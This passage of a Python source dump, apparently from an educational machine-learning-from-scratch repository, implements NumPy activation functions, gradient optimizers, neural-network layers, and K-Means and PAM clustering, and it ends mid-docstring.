np.exp(-x)) def gradient(self, x): return self.__call__(x) * (1 - self.__call__(x)) class Softmax(): def __call__(self, x): e_x = np.exp(x - np.max(x, axis=-1, keepdims=True)) return e_x / np.sum(e_x, axis=-1, keepdims=True) def gradient(self, x): p = self.__call__(x) return p * (1 - p) class TanH(): def __call__(self, x): return 2 / (1 + np.exp(-2*x)) - 1 def gradient(self, x): return 1 - np.power(self.__call__(x), 2) class ReLU(): def __call__(self, x): return np.where(x >= 0, x, 0) def gradient(self, x): return np.where(x >= 0, 1, 0) class LeakyReLU(): def __init__(self, alpha=0.2): self.alpha = alpha def __call__(self, x): return np.where(x >= 0, x, self.alpha * x) def gradient(self, x): return np.where(x >= 0, 1, self.alpha) class ELU(): def __init__(self, alpha=0.1): self.alpha = alpha def __call__(self, x): return np.where(x >= 0.0, x, self.alpha * (np.exp(x) - 1)) def gradient(self, x): return np.where(x >= 0.0, 1, self.__call__(x) + self.alpha) class SELU(): # Reference : https://arxiv.org/abs/1706.02515, # https://github.com/bioinf-jku/SNNs/blob/master/SelfNormalizingNetworks_MLP_MNIST.ipynb def __init__(self): self.alpha = 1.6732632423543772848170429916717 self.scale = 1.0507009873554804934193349852946 def __call__(self, x): return self.scale * np.where(x >= 0.0, x, self.alpha*(np.exp(x)-1)) def gradient(self, x): return self.scale * np.where(x >= 0.0, 1, self.alpha * np.exp(x)) class SoftPlus(): def __call__(self, x): return np.log(1 + np.exp(x)) def gradient(self, x): return 1 / (1 + np.exp(-x)) File: mlfromscratch/deep_learning/__init__.py from .neural_network import NeuralNetwork File: mlfromscratch/deep_learning/optimizers.py import numpy as np from mlfromscratch.utils import make_diagonal, normalize # Optimizers for models that use gradient based methods for finding the # weights that minimizes the loss. # A great resource for understanding these methods: # http://sebastianruder.com/optimizing-gradient-descent/index.html class StochasticGradientDescent(): def __init__(self, learning_rate=0.01, momentum=0): self.learning_rate = learning_rate self.momentum = momentum self.w_updt = None def update(self, w, grad_wrt_w): # If not initialized if self.w_updt is None: self.w_updt = np.zeros(np.shape(w)) # Use momentum if set self.w_updt = self.momentum * self.w_updt + (1 - self.momentum) * grad_wrt_w # Move against the gradient to minimize loss return w - self.learning_rate * self.w_updt class NesterovAcceleratedGradient(): def __init__(self, learning_rate=0.001, momentum=0.4): self.learning_rate = learning_rate self.momentum = momentum self.w_updt = np.array([]) def update(self, w, grad_func): # Calculate the gradient of the loss a bit further down the slope from w approx_future_grad = np.clip(grad_func(w - self.momentum * self.w_updt), -1, 1) # Initialize on first update if not self.w_updt.any(): self.w_updt = np.zeros(np.shape(w)) self.w_updt = self.momentum * self.w_updt + self.learning_rate * approx_future_grad # Move against the gradient to minimize loss return w - self.w_updt class Adagrad(): def __init__(self, learning_rate=0.01): self.learning_rate = learning_rate self.G = None # Sum of squares of the gradients self.eps = 1e-8 def update(self, w, grad_wrt_w): # If not initialized if self.G is None: self.G = np.zeros(np.shape(w)) # Add the square of the gradient of the loss function at w self.G += np.power(grad_wrt_w, 2) # Adaptive gradient with higher learning rate for sparse data return w - self.learning_rate * grad_wrt_w / np.sqrt(self.G + self.eps) class Adadelta(): def __init__(self, rho=0.95, eps=1e-6): self.E_w_updt = None # Running average of squared parameter updates self.E_grad = None # Running average of the squared gradient of w self.w_updt = None # Parameter update self.eps = eps self.rho = rho def update(self, w, grad_wrt_w): # If not initialized if self.w_updt is None: self.w_updt = np.zeros(np.shape(w)) self.E_w_updt = np.zeros(np.shape(w)) self.E_grad = np.zeros(np.shape(grad_wrt_w)) # Update average of gradients at w self.E_grad = self.rho * self.E_grad + (1 - self.rho) * np.power(grad_wrt_w, 2) RMS_delta_w = np.sqrt(self.E_w_updt + self.eps) RMS_grad = np.sqrt(self.E_grad + self.eps) # Adaptive learning rate adaptive_lr = RMS_delta_w / RMS_grad # Calculate the update self.w_updt = adaptive_lr * grad_wrt_w # Update the running average of w updates self.E_w_updt = self.rho * self.E_w_updt + (1 - self.rho) * np.power(self.w_updt, 2) return w - self.w_updt class RMSprop(): def __init__(self, learning_rate=0.01, rho=0.9): self.learning_rate = learning_rate self.Eg = None # Running average of the square gradients at w self.eps = 1e-8 self.rho = rho def update(self, w, grad_wrt_w): # If not initialized if self.Eg is None: self.Eg = np.zeros(np.shape(grad_wrt_w)) self.Eg = self.rho * self.Eg + (1 - self.rho) * np.power(grad_wrt_w, 2) # Divide the learning rate for a weight by a running average of the magnitudes of recent # gradients for that weight return w - self.learning_rate * grad_wrt_w / np.sqrt(self.Eg + self.eps) class Adam(): def __init__(self, learning_rate=0.001, b1=0.9, b2=0.999): self.learning_rate = learning_rate self.eps = 1e-8 self.m = None self.v = None # Decay rates self.b1 = b1 self.b2 = b2 def update(self, w, grad_wrt_w): # If not initialized if self.m is None: self.m = np.zeros(np.shape(grad_wrt_w)) self.v = np.zeros(np.shape(grad_wrt_w)) self.m = self.b1 * self.m + (1 - self.b1) * grad_wrt_w self.v = self.b2 * self.v + (1 - self.b2) * np.power(grad_wrt_w, 2) m_hat = self.m / (1 - self.b1) v_hat = self.v / (1 - self.b2) self.w_updt = self.learning_rate * m_hat / (np.sqrt(v_hat) + self.eps) return w - self.w_updt File: mlfromscratch/deep_learning/neural_network.py from __future__ import print_function, division from terminaltables import AsciiTable import numpy as np import progressbar from mlfromscratch.utils import batch_iterator from mlfromscratch.utils.misc import bar_widgets class NeuralNetwork(): """Neural Network. Deep Learning base model. Parameters: ----------- optimizer: class The weight optimizer that will be used to tune the weights in order of minimizing the loss. loss: class Loss function used to measure the model's performance. SquareLoss or CrossEntropy. validation: tuple A tuple containing validation data and labels (X, y) """ def __init__(self, optimizer, loss, validation_data=None): self.optimizer = optimizer self.layers = [] self.errors = {"training": [], "validation": []} self.loss_function = loss() self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) self.val_set = None if validation_data: X, y = validation_data self.val_set = {"X": X, "y": y} def set_trainable(self, trainable): """ Method which enables freezing of the weights of the network's layers. """ for layer in self.layers: layer.trainable = trainable def add(self, layer): """ Method which adds a layer to the neural network """ # If this is not the first layer added then set the input shape # to the output shape of the last added layer if self.layers: layer.set_input_shape(shape=self.layers[-1].output_shape()) # If the layer has weights that needs to be initialized if hasattr(layer, 'initialize'): layer.initialize(optimizer=self.optimizer) # Add layer to the network self.layers.append(layer) def test_on_batch(self, X, y): """ Evaluates the model over a single batch of samples """ y_pred = self._forward_pass(X, training=False) loss = np.mean(self.loss_function.loss(y, y_pred)) acc = self.loss_function.acc(y, y_pred) return loss, acc def train_on_batch(self, X, y): """ Single gradient update over one batch of samples """ y_pred = self._forward_pass(X) loss = np.mean(self.loss_function.loss(y, y_pred)) acc = self.loss_function.acc(y, y_pred) # Calculate the gradient of the loss function wrt y_pred loss_grad = self.loss_function.gradient(y, y_pred) # Backpropagate. Update weights self._backward_pass(loss_grad=loss_grad) return loss, acc def fit(self, X, y, n_epochs, batch_size): """ Trains the model for a fixed number of epochs """ for _ in self.progressbar(range(n_epochs)): batch_error = [] for X_batch, y_batch in batch_iterator(X, y, batch_size=batch_size): loss, _ = self.train_on_batch(X_batch, y_batch) batch_error.append(loss) self.errors["training"].append(np.mean(batch_error)) if self.val_set is not None: val_loss, _ = self.test_on_batch(self.val_set["X"], self.val_set["y"]) self.errors["validation"].append(val_loss) return self.errors["training"], self.errors["validation"] def _forward_pass(self, X, training=True): """ Calculate the output of the NN """ layer_output = X for layer in self.layers: layer_output = layer.forward_pass(layer_output, training) return layer_output def _backward_pass(self, loss_grad): """ Propagate the gradient 'backwards' and update the weights in each layer """ for layer in reversed(self.layers): loss_grad = layer.backward_pass(loss_grad) def summary(self, name="Model Summary"): # Print model name print (AsciiTable([[name]]).table) # Network input shape (first layer's input shape) print ("Input Shape: %s" % str(self.layers[0].input_shape)) # Iterate through network and get each layer's configuration table_data = [["Layer Type", "Parameters", "Output Shape"]] tot_params = 0 for layer in self.layers: layer_name = layer.layer_name() params = layer.parameters() out_shape = layer.output_shape() table_data.append([layer_name, str(params), str(out_shape)]) tot_params += params # Print network configuration table print (AsciiTable(table_data).table) print ("Total Parameters: %d\n" % tot_params) def predict(self, X): """ Use the trained model to predict labels of X """ return self._forward_pass(X, training=False) File: mlfromscratch/deep_learning/layers.py from __future__ import print_function, division import math import numpy as np import copy from mlfromscratch.deep_learning.activation_functions import Sigmoid, ReLU, SoftPlus, LeakyReLU from mlfromscratch.deep_learning.activation_functions import TanH, ELU, SELU, Softmax class Layer(object): def set_input_shape(self, shape): """ Sets the shape that the layer expects of the input in the forward pass method """ self.input_shape = shape def layer_name(self): """ The name of the layer. Used in model summary. """ return self.__class__.__name__ def parameters(self): """ The number of trainable parameters used by the layer """ return 0 def forward_pass(self, X, training): """ Propogates the signal forward in the network """ raise NotImplementedError() def backward_pass(self, accum_grad): """ Propogates the accumulated gradient backwards in the network. If the has trainable weights then these weights are also tuned in this method. As input (accum_grad) it receives the gradient with respect to the output of the layer and returns the gradient with respect to the output of the previous layer. """ raise NotImplementedError() def output_shape(self): """ The shape of the output produced by forward_pass """ raise NotImplementedError() class Dense(Layer): """A fully-connected NN layer. Parameters: ----------- n_units: int The number of neurons in the layer. input_shape: tuple The expected input shape of the layer. For dense layers a single digit specifying the number of features of the input. Must be specified if it is the first layer in the network. """ def __init__(self, n_units, input_shape=None): self.layer_input = None self.input_shape = input_shape self.n_units = n_units self.trainable = True self.W = None self.w0 = None def initialize(self, optimizer): # Initialize the weights limit = 1 / math.sqrt(self.input_shape[0]) self.W = np.random.uniform(-limit, limit, (self.input_shape[0], self.n_units)) self.w0 = np.zeros((1, self.n_units)) # Weight optimizers self.W_opt = copy.copy(optimizer) self.w0_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.w0.shape) def forward_pass(self, X, training=True): self.layer_input = X return X.dot(self.W) + self.w0 def backward_pass(self, accum_grad): # Save weights used during forwards pass W = self.W if self.trainable: # Calculate gradient w.r.t layer weights grad_w = self.layer_input.T.dot(accum_grad) grad_w0 = np.sum(accum_grad, axis=0, keepdims=True) # Update the layer weights self.W = self.W_opt.update(self.W, grad_w) self.w0 = self.w0_opt.update(self.w0, grad_w0) # Return accumulated gradient for next layer # Calculated based on the weights used during the forward pass accum_grad = accum_grad.dot(W.T) return accum_grad def output_shape(self): return (self.n_units, ) class RNN(Layer): """A Vanilla Fully-Connected Recurrent Neural Network layer. Parameters: ----------- n_units: int The number of hidden states in the layer. activation: string The name of the activation function which will be applied to the output of each state. bptt_trunc: int Decides how many time steps the gradient should be propagated backwards through states given the loss gradient for time step t. input_shape: tuple The expected input shape of the layer. For dense layers a single digit specifying the number of features of the input. Must be specified if it is the first layer in the network. Reference: http://www.wildml.com/2015/09/recurrent-neural-networks-tutorial-part-2-implementing-a-language-model-rnn-with-python-numpy-and-theano/ """ def __init__(self, n_units, activation='tanh', bptt_trunc=5, input_shape=None): self.input_shape = input_shape self.n_units = n_units self.activation = activation_functions[activation]() self.trainable = True self.bptt_trunc = bptt_trunc self.W = None # Weight of the previous state self.V = None # Weight of the output self.U = None # Weight of the input def initialize(self, optimizer): timesteps, input_dim = self.input_shape # Initialize the weights limit = 1 / math.sqrt(input_dim) self.U = np.random.uniform(-limit, limit, (self.n_units, input_dim)) limit = 1 / math.sqrt(self.n_units) self.V = np.random.uniform(-limit, limit, (input_dim, self.n_units)) self.W = np.random.uniform(-limit, limit, (self.n_units, self.n_units)) # Weight optimizers self.U_opt = copy.copy(optimizer) self.V_opt = copy.copy(optimizer) self.W_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.U.shape) + np.prod(self.V.shape) def forward_pass(self, X, training=True): self.layer_input = X batch_size, timesteps, input_dim = X.shape # Save these values for use in backprop. self.state_input = np.zeros((batch_size, timesteps, self.n_units)) self.states = np.zeros((batch_size, timesteps+1, self.n_units)) self.outputs = np.zeros((batch_size, timesteps, input_dim)) # Set last time step to zero for calculation of the state_input at time step zero self.states[:, -1] = np.zeros((batch_size, self.n_units)) for t in range(timesteps): # Input to state_t is the current input and output of previous states self.state_input[:, t] = X[:, t].dot(self.U.T) + self.states[:, t-1].dot(self.W.T) self.states[:, t] = self.activation(self.state_input[:, t]) self.outputs[:, t] = self.states[:, t].dot(self.V.T) return self.outputs def backward_pass(self, accum_grad): _, timesteps, _ = accum_grad.shape # Variables where we save the accumulated gradient w.r.t each parameter grad_U = np.zeros_like(self.U) grad_V = np.zeros_like(self.V) grad_W = np.zeros_like(self.W) # The gradient w.r.t the layer input. # Will be passed on to the previous layer in the network accum_grad_next = np.zeros_like(accum_grad) # Back Propagation Through Time for t in reversed(range(timesteps)): # Update gradient w.r.t V at time step t grad_V += accum_grad[:, t].T.dot(self.states[:, t]) # Calculate the gradient w.r.t the state input grad_wrt_state = accum_grad[:, t].dot(self.V) * self.activation.gradient(self.state_input[:, t]) # Gradient w.r.t the layer input accum_grad_next[:, t] = grad_wrt_state.dot(self.U) # Update gradient w.r.t W and U by backprop. from time step t for at most # self.bptt_trunc number of time steps for t_ in reversed(np.arange(max(0, t - self.bptt_trunc), t+1)): grad_U += grad_wrt_state.T.dot(self.layer_input[:, t_]) grad_W += grad_wrt_state.T.dot(self.states[:, t_-1]) # Calculate gradient w.r.t previous state grad_wrt_state = grad_wrt_state.dot(self.W) * self.activation.gradient(self.state_input[:, t_-1]) # Update weights self.U = self.U_opt.update(self.U, grad_U) self.V = self.V_opt.update(self.V, grad_V) self.W = self.W_opt.update(self.W, grad_W) return accum_grad_next def output_shape(self): return self.input_shape class Conv2D(Layer): """A 2D Convolution Layer. Parameters: ----------- n_filters: int The number of filters that will convolve over the input matrix. The number of channels of the output shape. filter_shape: tuple A tuple (filter_height, filter_width). input_shape: tuple The shape of the expected input of the layer. (batch_size, channels, height, width) Only needs to be specified for first layer in the network. padding: string Either 'same' or 'valid'. 'same' results in padding being added so that the output height and width matches the input height and width. For 'valid' no padding is added. stride: int The stride length of the filters during the convolution over the input. """ def __init__(self, n_filters, filter_shape, input_shape=None, padding='same', stride=1): self.n_filters = n_filters self.filter_shape = filter_shape self.padding = padding self.stride = stride self.input_shape = input_shape self.trainable = True def initialize(self, optimizer): # Initialize the weights filter_height, filter_width = self.filter_shape channels = self.input_shape[0] limit = 1 / math.sqrt(np.prod(self.filter_shape)) self.W = np.random.uniform(-limit, limit, size=(self.n_filters, channels, filter_height, filter_width)) self.w0 = np.zeros((self.n_filters, 1)) # Weight optimizers self.W_opt = copy.copy(optimizer) self.w0_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.w0.shape) def forward_pass(self, X, training=True): batch_size, channels, height, width = X.shape self.layer_input = X # Turn image shape into column shape # (enables dot product between input and weights) self.X_col = image_to_column(X, self.filter_shape, stride=self.stride, output_shape=self.padding) # Turn weights into column shape self.W_col = self.W.reshape((self.n_filters, -1)) # Calculate output output = self.W_col.dot(self.X_col) + self.w0 # Reshape into (n_filters, out_height, out_width, batch_size) output = output.reshape(self.output_shape() + (batch_size, )) # Redistribute axises so that batch size comes first return output.transpose(3,0,1,2) def backward_pass(self, accum_grad): # Reshape accumulated gradient into column shape accum_grad = accum_grad.transpose(1, 2, 3, 0).reshape(self.n_filters, -1) if self.trainable: # Take dot product between column shaped accum. gradient and column shape # layer input to determine the gradient at the layer with respect to layer weights grad_w = accum_grad.dot(self.X_col.T).reshape(self.W.shape) # The gradient with respect to bias terms is the sum similarly to in Dense layer grad_w0 = np.sum(accum_grad, axis=1, keepdims=True) # Update the layers weights self.W = self.W_opt.update(self.W, grad_w) self.w0 = self.w0_opt.update(self.w0, grad_w0) # Recalculate the gradient which will be propogated back to prev. layer accum_grad = self.W_col.T.dot(accum_grad) # Reshape from column shape to image shape accum_grad = column_to_image(accum_grad, self.layer_input.shape, self.filter_shape, stride=self.stride, output_shape=self.padding) return accum_grad def output_shape(self): channels, height, width = self.input_shape pad_h, pad_w = determine_padding(self.filter_shape, output_shape=self.padding) output_height = (height + np.sum(pad_h) - self.filter_shape[0]) / self.stride + 1 output_width = (width + np.sum(pad_w) - self.filter_shape[1]) / self.stride + 1 return self.n_filters, int(output_height), int(output_width) class BatchNormalization(Layer): """Batch normalization. """ def __init__(self, momentum=0.99): self.momentum = momentum self.trainable = True self.eps = 0.01 self.running_mean = None self.running_var = None def initialize(self, optimizer): # Initialize the parameters self.gamma = np.ones(self.input_shape) self.beta = np.zeros(self.input_shape) # parameter optimizers self.gamma_opt = copy.copy(optimizer) self.beta_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.gamma.shape) + np.prod(self.beta.shape) def forward_pass(self, X, training=True): # Initialize running mean and variance if first run if self.running_mean is None: self.running_mean = np.mean(X, axis=0) self.running_var = np.var(X, axis=0) if training and self.trainable: mean = np.mean(X, axis=0) var = np.var(X, axis=0) self.running_mean = self.momentum * self.running_mean + (1 - self.momentum) * mean self.running_var = self.momentum * self.running_var + (1 - self.momentum) * var else: mean = self.running_mean var = self.running_var # Statistics saved for backward pass self.X_centered = X - mean self.stddev_inv = 1 / np.sqrt(var + self.eps) X_norm = self.X_centered * self.stddev_inv output = self.gamma * X_norm + self.beta return output def backward_pass(self, accum_grad): # Save parameters used during the forward pass gamma = self.gamma # If the layer is trainable the parameters are updated if self.trainable: X_norm = self.X_centered * self.stddev_inv grad_gamma = np.sum(accum_grad * X_norm, axis=0) grad_beta = np.sum(accum_grad, axis=0) self.gamma = self.gamma_opt.update(self.gamma, grad_gamma) self.beta = self.beta_opt.update(self.beta, grad_beta) batch_size = accum_grad.shape[0] # The gradient of the loss with respect to the layer inputs (use weights and statistics from forward pass) accum_grad = (1 / batch_size) * gamma * self.stddev_inv * ( batch_size * accum_grad - np.sum(accum_grad, axis=0) - self.X_centered * self.stddev_inv**2 * np.sum(accum_grad * self.X_centered, axis=0) ) return accum_grad def output_shape(self): return self.input_shape class PoolingLayer(Layer): """A parent class of MaxPooling2D and AveragePooling2D """ def __init__(self, pool_shape=(2, 2), stride=1, padding=0): self.pool_shape = pool_shape self.stride = stride self.padding = padding self.trainable = True def forward_pass(self, X, training=True): self.layer_input = X batch_size, channels, height, width = X.shape _, out_height, out_width = self.output_shape() X = X.reshape(batch_size*channels, 1, height, width) X_col = image_to_column(X, self.pool_shape, self.stride, self.padding) # MaxPool or AveragePool specific method output = self._pool_forward(X_col) output = output.reshape(out_height, out_width, batch_size, channels) output = output.transpose(2, 3, 0, 1) return output def backward_pass(self, accum_grad): batch_size, _, _, _ = accum_grad.shape channels, height, width = self.input_shape accum_grad = accum_grad.transpose(2, 3, 0, 1).ravel() # MaxPool or AveragePool specific method accum_grad_col = self._pool_backward(accum_grad) accum_grad = column_to_image(accum_grad_col, (batch_size * channels, 1, height, width), self.pool_shape, self.stride, 0) accum_grad = accum_grad.reshape((batch_size,) + self.input_shape) return accum_grad def output_shape(self): channels, height, width = self.input_shape out_height = (height - self.pool_shape[0]) / self.stride + 1 out_width = (width - self.pool_shape[1]) / self.stride + 1 assert out_height % 1 == 0 assert out_width % 1 == 0 return channels, int(out_height), int(out_width) class MaxPooling2D(PoolingLayer): def _pool_forward(self, X_col): arg_max = np.argmax(X_col, axis=0).flatten() output = X_col[arg_max, range(arg_max.size)] self.cache = arg_max return output def _pool_backward(self, accum_grad): accum_grad_col = np.zeros((np.prod(self.pool_shape), accum_grad.size)) arg_max = self.cache accum_grad_col[arg_max, range(accum_grad.size)] = accum_grad return accum_grad_col class AveragePooling2D(PoolingLayer): def _pool_forward(self, X_col): output = np.mean(X_col, axis=0) return output def _pool_backward(self, accum_grad): accum_grad_col = np.zeros((np.prod(self.pool_shape), accum_grad.size)) accum_grad_col[:, range(accum_grad.size)] = 1. / accum_grad_col.shape[0] * accum_grad return accum_grad_col class ConstantPadding2D(Layer): """Adds rows and columns of constant values to the input. Expects the input to be of shape (batch_size, channels, height, width) Parameters: ----------- padding: tuple The amount of padding along the height and width dimension of the input. If (pad_h, pad_w) the same symmetric padding is applied along height and width dimension. If ((pad_h0, pad_h1), (pad_w0, pad_w1)) the specified padding is added to beginning and end of the height and width dimension. padding_value: int or tuple The value the is added as padding. """ def __init__(self, padding, padding_value=0): self.padding = padding self.trainable = True if not isinstance(padding[0], tuple): self.padding = ((padding[0], padding[0]), padding[1]) if not isinstance(padding[1], tuple): self.padding = (self.padding[0], (padding[1], padding[1])) self.padding_value = padding_value def forward_pass(self, X, training=True): output = np.pad(X, pad_width=((0,0), (0,0), self.padding[0], self.padding[1]), mode="constant", constant_values=self.padding_value) return output def backward_pass(self, accum_grad): pad_top, pad_left = self.padding[0][0], self.padding[1][0] height, width = self.input_shape[1], self.input_shape[2] accum_grad = accum_grad[:, :, pad_top:pad_top+height, pad_left:pad_left+width] return accum_grad def output_shape(self): new_height = self.input_shape[1] + np.sum(self.padding[0]) new_width = self.input_shape[2] + np.sum(self.padding[1]) return (self.input_shape[0], new_height, new_width) class ZeroPadding2D(ConstantPadding2D): """Adds rows and columns of zero values to the input. Expects the input to be of shape (batch_size, channels, height, width) Parameters: ----------- padding: tuple The amount of padding along the height and width dimension of the input. If (pad_h, pad_w) the same symmetric padding is applied along height and width dimension. If ((pad_h0, pad_h1), (pad_w0, pad_w1)) the specified padding is added to beginning and end of the height and width dimension. """ def __init__(self, padding): self.padding = padding if isinstance(padding[0], int): self.padding = ((padding[0], padding[0]), padding[1]) if isinstance(padding[1], int): self.padding = (self.padding[0], (padding[1], padding[1])) self.padding_value = 0 class Flatten(Layer): """ Turns a multidimensional matrix into two-dimensional """ def __init__(self, input_shape=None): self.prev_shape = None self.trainable = True self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape return X.reshape((X.shape[0], -1)) def backward_pass(self, accum_grad): return accum_grad.reshape(self.prev_shape) def output_shape(self): return (np.prod(self.input_shape),) class UpSampling2D(Layer): """ Nearest neighbor up sampling of the input. Repeats the rows and columns of the data by size[0] and size[1] respectively. Parameters: ----------- size: tuple (size_y, size_x) - The number of times each axis will be repeated. """ def __init__(self, size=(2,2), input_shape=None): self.prev_shape = None self.trainable = True self.size = size self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape # Repeat each axis as specified by size X_new = X.repeat(self.size[0], axis=2).repeat(self.size[1], axis=3) return X_new def backward_pass(self, accum_grad): # Down sample input to previous shape accum_grad = accum_grad[:, :, ::self.size[0], ::self.size[1]] return accum_grad def output_shape(self): channels, height, width = self.input_shape return channels, self.size[0] * height, self.size[1] * width class Reshape(Layer): """ Reshapes the input tensor into specified shape Parameters: ----------- shape: tuple The shape which the input shall be reshaped to. """ def __init__(self, shape, input_shape=None): self.prev_shape = None self.trainable = True self.shape = shape self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape return X.reshape((X.shape[0], ) + self.shape) def backward_pass(self, accum_grad): return accum_grad.reshape(self.prev_shape) def output_shape(self): return self.shape class Dropout(Layer): """A layer that randomly sets a fraction p of the output units of the previous layer to zero. Parameters: ----------- p: float The probability that unit x is set to zero. """ def __init__(self, p=0.2): self.p = p self._mask = None self.input_shape = None self.n_units = None self.pass_through = True self.trainable = True def forward_pass(self, X, training=True): c = (1 - self.p) if training: self._mask = np.random.uniform(size=X.shape) > self.p c = self._mask return X * c def backward_pass(self, accum_grad): return accum_grad * self._mask def output_shape(self): return self.input_shape activation_functions = { 'relu': ReLU, 'sigmoid': Sigmoid, 'selu': SELU, 'elu': ELU, 'softmax': Softmax, 'leaky_relu': LeakyReLU, 'tanh': TanH, 'softplus': SoftPlus } class Activation(Layer): """A layer that applies an activation operation to the input. Parameters: ----------- name: string The name of the activation function that will be used. """ def __init__(self, name): self.activation_name = name self.activation_func = activation_functions[name]() self.trainable = True def layer_name(self): return "Activation (%s)" % (self.activation_func.__class__.__name__) def forward_pass(self, X, training=True): self.layer_input = X return self.activation_func(X) def backward_pass(self, accum_grad): return accum_grad * self.activation_func.gradient(self.layer_input) def output_shape(self): return self.input_shape # Method which calculates the padding based on the specified output shape and the # shape of the filters def determine_padding(filter_shape, output_shape="same"): # No padding if output_shape == "valid": return (0, 0), (0, 0) # Pad so that the output shape is the same as input shape (given that stride=1) elif output_shape == "same": filter_height, filter_width = filter_shape # Derived from: # output_height = (height + pad_h - filter_height) / stride + 1 # In this case output_height = height and stride = 1. This gives the # expression for the padding below. pad_h1 = int(math.floor((filter_height - 1)/2)) pad_h2 = int(math.ceil((filter_height - 1)/2)) pad_w1 = int(math.floor((filter_width - 1)/2)) pad_w2 = int(math.ceil((filter_width - 1)/2)) return (pad_h1, pad_h2), (pad_w1, pad_w2) # Reference: CS231n Stanford def get_im2col_indices(images_shape, filter_shape, padding, stride=1): # First figure out what the size of the output should be batch_size, channels, height, width = images_shape filter_height, filter_width = filter_shape pad_h, pad_w = padding out_height = int((height + np.sum(pad_h) - filter_height) / stride + 1) out_width = int((width + np.sum(pad_w) - filter_width) / stride + 1) i0 = np.repeat(np.arange(filter_height), filter_width) i0 = np.tile(i0, channels) i1 = stride * np.repeat(np.arange(out_height), out_width) j0 = np.tile(np.arange(filter_width), filter_height * channels) j1 = stride * np.tile(np.arange(out_width), out_height) i = i0.reshape(-1, 1) + i1.reshape(1, -1) j = j0.reshape(-1, 1) + j1.reshape(1, -1) k = np.repeat(np.arange(channels), filter_height * filter_width).reshape(-1, 1) return (k, i, j) # Method which turns the image shaped input to column shape. # Used during the forward pass. # Reference: CS231n Stanford def image_to_column(images, filter_shape, stride, output_shape='same'): filter_height, filter_width = filter_shape pad_h, pad_w = determine_padding(filter_shape, output_shape) # Add padding to the image images_padded = np.pad(images, ((0, 0), (0, 0), pad_h, pad_w), mode='constant') # Calculate the indices where the dot products are to be applied between weights # and the image k, i, j = get_im2col_indices(images.shape, filter_shape, (pad_h, pad_w), stride) # Get content from image at those indices cols = images_padded[:, k, i, j] channels = images.shape[1] # Reshape content into column shape cols = cols.transpose(1, 2, 0).reshape(filter_height * filter_width * channels, -1) return cols # Method which turns the column shaped input to image shape. # Used during the backward pass. # Reference: CS231n Stanford def column_to_image(cols, images_shape, filter_shape, stride, output_shape='same'): batch_size, channels, height, width = images_shape pad_h, pad_w = determine_padding(filter_shape, output_shape) height_padded = height + np.sum(pad_h) width_padded = width + np.sum(pad_w) images_padded = np.zeros((batch_size, channels, height_padded, width_padded)) # Calculate the indices where the dot products are applied between weights # and the image k, i, j = get_im2col_indices(images_shape, filter_shape, (pad_h, pad_w), stride) cols = cols.reshape(channels * np.prod(filter_shape), -1, batch_size) cols = cols.transpose(2, 0, 1) # Add column content to the images at the indices np.add.at(images_padded, (slice(None), k, i, j), cols) # Return image without padding return images_padded[:, :, pad_h[0]:height+pad_h[0], pad_w[0]:width+pad_w[0]] File: mlfromscratch/unsupervised_learning/k_means.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, Plot from mlfromscratch.unsupervised_learning import * class KMeans(): """A simple clustering method that forms k clusters by iteratively reassigning samples to the closest centroids and after that moves the centroids to the center of the new formed clusters. Parameters: ----------- k: int The number of clusters the algorithm will form. max_iterations: int The number of iterations the algorithm will run for if it does not converge before that. """ def __init__(self, k=2, max_iterations=500): self.k = k self.max_iterations = max_iterations def _init_random_centroids(self, X): """ Initialize the centroids as k random samples of X""" n_samples, n_features = np.shape(X) centroids = np.zeros((self.k, n_features)) for i in range(self.k): centroid = X[np.random.choice(range(n_samples))] centroids[i] = centroid return centroids def _closest_centroid(self, sample, centroids): """ Return the index of the closest centroid to the sample """ closest_i = 0 closest_dist = float('inf') for i, centroid in enumerate(centroids): distance = euclidean_distance(sample, centroid) if distance < closest_dist: closest_i = i closest_dist = distance return closest_i def _create_clusters(self, centroids, X): """ Assign the samples to the closest centroids to create clusters """ n_samples = np.shape(X)[0] clusters = [[] for _ in range(self.k)] for sample_i, sample in enumerate(X): centroid_i = self._closest_centroid(sample, centroids) clusters[centroid_i].append(sample_i) return clusters def _calculate_centroids(self, clusters, X): """ Calculate new centroids as the means of the samples in each cluster """ n_features = np.shape(X)[1] centroids = np.zeros((self.k, n_features)) for i, cluster in enumerate(clusters): centroid = np.mean(X[cluster], axis=0) centroids[i] = centroid return centroids def _get_cluster_labels(self, clusters, X): """ Classify samples as the index of their clusters """ # One prediction for each sample y_pred = np.zeros(np.shape(X)[0]) for cluster_i, cluster in enumerate(clusters): for sample_i in cluster: y_pred[sample_i] = cluster_i return y_pred def predict(self, X): """ Do K-Means clustering and return cluster indices """ # Initialize centroids as k random samples from X centroids = self._init_random_centroids(X) # Iterate until convergence or for max iterations for _ in range(self.max_iterations): # Assign samples to closest centroids (create clusters) clusters = self._create_clusters(centroids, X) # Save current centroids for convergence check prev_centroids = centroids # Calculate new centroids from the clusters centroids = self._calculate_centroids(clusters, X) # If no centroids have changed => convergence diff = centroids - prev_centroids if not diff.any(): break return self._get_cluster_labels(clusters, X) File: mlfromscratch/unsupervised_learning/partitioning_around_medoids.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, Plot from mlfromscratch.unsupervised_learning import PCA class PAM(): """A simple clustering method that forms k clusters by first assigning samples to the closest medoids, and then swapping medoids with non-medoid samples if the total distance (cost) between the cluster members and their medoid is smaller than prevoisly. Parameters: ----------- k: int The number of clusters the algorithm will form. """ def __init__(self, k=2): self.k = k def _init_random_medoids(self, X): """ Initialize the medoids as random samples """ n_samples, n_features = np.shape(X) medoids = np.zeros((self.k, n_features)) for i in range(self.k): medoid = X[np.random.choice(range(n_samples))] medoids[i] = medoid return medoids def _closest_medoid(self, sample, medoids): """ Return the index of the closest medoid to the sample """ closest_i = None closest_distance = float("inf") for i, medoid in enumerate(medoids): distance = euclidean_distance(sample, medoid) if distance < closest_distance: closest_i = i closest_distance = distance return closest_i def _create_clusters(self, X, medoids): """ Assign the samples to the closest medoids to create clusters 